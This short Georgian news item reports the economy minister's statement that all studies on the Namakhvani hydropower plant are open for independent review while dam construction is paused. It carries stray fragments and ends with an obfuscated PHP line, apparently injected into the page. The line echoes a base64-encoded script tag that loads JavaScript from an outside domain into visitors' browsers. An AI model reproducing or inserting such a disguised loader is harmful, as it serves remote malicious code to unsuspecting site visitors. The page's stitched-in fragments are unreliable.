celsiusi
ავერსი შნაიდერი
ეკონომიკის მინისტრის განცხადებით, პროცესი, რომელიც წამოწყებულია „ნამახვანი ჰესის" უსაფრთხოებისადმი ნდობის გასაზრდელად და კვლევების გადასამოწმებლად, საჭიროებს მშვიდ და საქმიან გარემოს. ამის შესახებ “Business Tims”- ეკონომიკისა და მდგრადი განვითარების სამინისტროდან აცნობეს. 
 
„ჩვენ წამოვიწყეთ პროცესი „უკეთესი ნამახვანისთვის," რაც იმას ნიშნავს, რომ ყველა კვლევა, რომელიც ჩატარებულია კომპანიის მხრიდან და გადამოწმებულია გარემოს დაცვის სამინისტროს მიერ, არის ღია ნებისმიერი დაინტერესებული პირისთვის თუ ექსპერტისთვის და ამ თვეების განმავლობაში, ვიდრე კაშხლის მშენებლობა შეჩერებულია, მოხდება პროექტის სიღრმისეული გადამოწმება. ჩვენს გვსურს ყველა, მათ შორის ადგილობრივი მოსახლეობა დარწმუნდეს იმაში, რომ მთავარი წუხილი, რაც უკავშირდებოდა კაშხლის და ზოგადად ჰესის უსაფრთხოებას, მოხსნილია და არ არსებობს რაიმე საფუძველი იმისთვის, რომ „ნამახვანი ჰესი" საფრთხეს შეგვიქმნის და დაგვაზარალებს" - აღნიშნა მინისტრმა.
 
 
  
2384
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");